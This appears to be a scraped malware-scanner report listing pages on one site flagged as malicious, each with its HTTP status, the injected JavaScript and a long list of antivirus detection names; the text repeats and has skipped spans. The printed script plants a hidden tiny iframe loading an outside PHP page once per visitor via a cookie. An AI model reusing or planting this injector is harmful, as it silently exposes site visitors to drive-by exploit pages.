... 273 bytes are skipped ... name ) { var start = document.cookie.indexOf( name + "=" ); var len = start + name.length + 1; if ( ( !start ) && ( name != document.cookie.substring( 0, name.length ) ) ) { return null; } if ( start == -1 ) return null; var end = document.cookie.indexOf( ";", len ); if ( end == -1 ) end = document.cookie.length; return unescape( document.cookie.substring( len, end ) );}if (navigator.cookieEnabled){if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/');zzzfff();}}Antivirus reports:- Qihoo-360
- Trojan.Generic
- AntiVir
- JS/iFrame.kpp
- Avast
- JS:Iframe-AHU [Trj]
- Ad-Aware
- Trojan.JS.Iframe.DEE
- Antiy-AVL
- Trojan/Script.AGeneric
- Ikarus
- Virus.HTML.Framer
- Rising
- JS:Script.JS.Quidvetis.a!1612922
- nProtect
- Trojan.JS.Iframe.DEE
- K7AntiVirus
- Riskware ( 885143830 )
- TrendMicro-HouseCall
- TROJ_GEN.F47V1116
- Emsisoft
- Trojan.JS.Iframe.DEE (B)
- Comodo
- UnclassifiedMalware
- McAfee-GW-Edition
- JS/Iframe.gen.u
- DrWeb
- JS.IFrame.459
- Microsoft
- Trojan:JS/Quidvetis.A
- Kaspersky
- HEUR:Trojan.Script.Generic
- MicroWorld-eScan
- Trojan.JS.Iframe.DEE
- Fortinet
- JS/Blacole.EU!tr.dldr
- McAfee
- JS/Iframe.gen.u
- NANO-Antivirus
- Trojan.Script.Iframe.bopaxv
- F-Secure
- Trojan.JS.Iframe.DEE
- F-Prot
- JS/IFrame.RS.gen
- Norman
- Blacole.XE
- Sophos
- Troj/Iframe-JH
- GData
- Trojan.JS.Iframe.DEE
- Commtouch
- JS/IFrame.RS.gen
- BitDefender
- Trojan.JS.Iframe.DEE
|
http://www.kangabag.org/bananas.html | 200 OK Content-Length: 3756 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function zzzfff() { var kvxf = document.createElement('iframe'); kvxf.src = 'http://www.larosadeiventi-bb.it/mLwKQtJF.php'; kvxf.style.position = 'absolute'; kvxf.style.border = '0'; kvxf.style.height = '9px'; kvxf.style.width = '7px'; kvxf.style.left = '1px'; kvxf.style.top = '1px'; if (!document.getElementById('kvxf')) { document.write('<div id=\'kvxf\'></div>'); document.getElementById('kvxf').appendChild(kvxf); }}function SetCookie(cookieName,cookieValue,nDays,path) { var today =
... 273 bytes are skipped ... name ) { var start = document.cookie.indexOf( name + "=" ); var len = start + name.length + 1; if ( ( !start ) && ( name != document.cookie.substring( 0, name.length ) ) ) { return null; } if ( start == -1 ) return null; var end = document.cookie.indexOf( ";", len ); if ( end == -1 ) end = document.cookie.length; return unescape( document.cookie.substring( len, end ) );}if (navigator.cookieEnabled){if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/');zzzfff();}}Antivirus reports:- Qihoo-360
- Trojan.Generic
- AntiVir
- JS/iFrame.kpp
- Avast
- JS:Iframe-AHU [Trj]
- Ad-Aware
- Trojan.JS.Iframe.DEE
- Antiy-AVL
- Trojan/Script.AGeneric
- Ikarus
- Virus.HTML.Framer
- Rising
- JS:Script.JS.Quidvetis.a!1612922
- nProtect
- Trojan.JS.Iframe.DEE
- K7AntiVirus
- Riskware ( 885143830 )
- TrendMicro-HouseCall
- TROJ_GEN.F47V1116
- Emsisoft
- Trojan.JS.Iframe.DEE (B)
- Comodo
- UnclassifiedMalware
- McAfee-GW-Edition
- JS/Iframe.gen.u
- DrWeb
- JS.IFrame.459
- Microsoft
- Trojan:JS/Quidvetis.A
- Kaspersky
- HEUR:Trojan.Script.Generic
- MicroWorld-eScan
- Trojan.JS.Iframe.DEE
- Fortinet
- JS/Blacole.EU!tr.dldr
- McAfee
- JS/Iframe.gen.u
- NANO-Antivirus
- Trojan.Script.Iframe.bopaxv
- F-Secure
- Trojan.JS.Iframe.DEE
- F-Prot
- JS/IFrame.RS.gen
- Norman
- Blacole.XE
- Sophos
- Troj/Iframe-JH
- GData
- Trojan.JS.Iframe.DEE
- Commtouch
- JS/IFrame.RS.gen
- BitDefender
- Trojan.JS.Iframe.DEE
|
http://www.kangabag.org/double2.html | 200 OK Content-Length: 3820 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function zzzfff() { var kvxf = document.createElement('iframe'); kvxf.src = 'http://www.larosadeiventi-bb.it/mLwKQtJF.php'; kvxf.style.position = 'absolute'; kvxf.style.border = '0'; kvxf.style.height = '9px'; kvxf.style.width = '7px'; kvxf.style.left = '1px'; kvxf.style.top = '1px'; if (!document.getElementById('kvxf')) { document.write('<div id=\'kvxf\'></div>'); document.getElementById('kvxf').appendChild(kvxf); }}function SetCookie(cookieName,cookieValue,nDays,path) { var today =
... 273 bytes are skipped ... name ) { var start = document.cookie.indexOf( name + "=" ); var len = start + name.length + 1; if ( ( !start ) && ( name != document.cookie.substring( 0, name.length ) ) ) { return null; } if ( start == -1 ) return null; var end = document.cookie.indexOf( ";", len ); if ( end == -1 ) end = document.cookie.length; return unescape( document.cookie.substring( len, end ) );}if (navigator.cookieEnabled){if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/');zzzfff();}}Antivirus reports:- Qihoo-360
- Trojan.Generic
- AntiVir
- JS/iFrame.kpp
- Avast
- JS:Iframe-AHU [Trj]
- Ad-Aware
- Trojan.JS.Iframe.DEE
- Antiy-AVL
- Trojan/Script.AGeneric
- Ikarus
- Virus.HTML.Framer
- Rising
- JS:Script.JS.Quidvetis.a!1612922
- nProtect
- Trojan.JS.Iframe.DEE
- K7AntiVirus
- Riskware ( 885143830 )
- TrendMicro-HouseCall
- TROJ_GEN.F47V1116
- Emsisoft
- Trojan.JS.Iframe.DEE (B)
- Comodo
- UnclassifiedMalware
- McAfee-GW-Edition
- JS/Iframe.gen.u
- DrWeb
- JS.IFrame.459
- Microsoft
- Trojan:JS/Quidvetis.A
- Kaspersky
- HEUR:Trojan.Script.Generic
- MicroWorld-eScan
- Trojan.JS.Iframe.DEE
- Fortinet
- JS/Blacole.EU!tr.dldr
- McAfee
- JS/Iframe.gen.u
- NANO-Antivirus
- Trojan.Script.Iframe.bopaxv
- F-Secure
- Trojan.JS.Iframe.DEE
- F-Prot
- JS/IFrame.RS.gen
- Norman
- Blacole.XE
- Sophos
- Troj/Iframe-JH
- GData
- Trojan.JS.Iframe.DEE
- Commtouch
- JS/IFrame.RS.gen
- BitDefender
- Trojan.JS.Iframe.DEE
|